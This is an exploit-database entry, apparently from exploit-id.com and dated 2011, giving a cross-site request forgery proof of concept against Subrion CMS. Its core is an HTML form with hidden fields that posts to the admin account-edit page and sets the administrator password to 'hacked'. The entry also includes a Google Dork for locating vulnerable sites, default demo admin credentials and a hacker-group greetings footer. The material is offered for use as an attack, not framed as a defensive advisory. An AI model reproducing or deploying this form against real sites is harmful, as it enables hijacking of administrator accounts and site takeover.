subrion <=XSRF/CSRF (Change Admin Password)



EKU-ID: 561 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-06-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/ 
Exploit-ID is the Exploit Information Disclosure

Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com            

               #########################################  
     I'm Caddy-Dz, member of Exploit-Id
  #########################################  
======================================================================
####
# Exploit Title: subrion <=XSRF/CSRF (Change Admin Password)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by Subrion CMS"
# Vendor: http://www.subrion.com/
# Tested on: [Ubuntu 10.10]
####

||> Demo: | User:admin / Pass:admin
http://demo.subrion.com/admin/


[+] ~~~~~ Change Admin Password ~~~~~
         ~~~~~~~~~~~~~~~~~~~~~~~~



<html>
<head>
<title>Exploited By Caddy-Dz</title>
</head>
<form action="http://127.0.0.1/admin/accounts/edit/?id=1" method="post" enctype="multipart/form-data">
<input type="hidden" name="prevent_csrf" value="14fd8d7087" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="fullname" value="Administrator" />
<input type="hidden" name="email" value="me@subrion.com" />
<input type="hidden" name="_password" value="hacked"/>
<input type="hidden" name="_password2" value="hacked" />
<input type="hidden" name="avatar" id="field_avatar" size="35" class="common no" />
<input type="hidden" name="address" value="19 Hartlane St." />
<input type="submit" name="save" value="Save Changes" />
<input type="hidden" name="city" value="Bradenton" />
<input type="hidden" name="do" value="edit" />
<input type="hidden" name="old_name" value="admin" />
<input type="hidden" name="id" value="1" />

</form>


 

 
####

Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  Kalashinkov3 ,|
  , (exploit-id.com) , (1337day.com) ,                                                       |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
  RmZ ...others                                                                              |
============================================================================================ |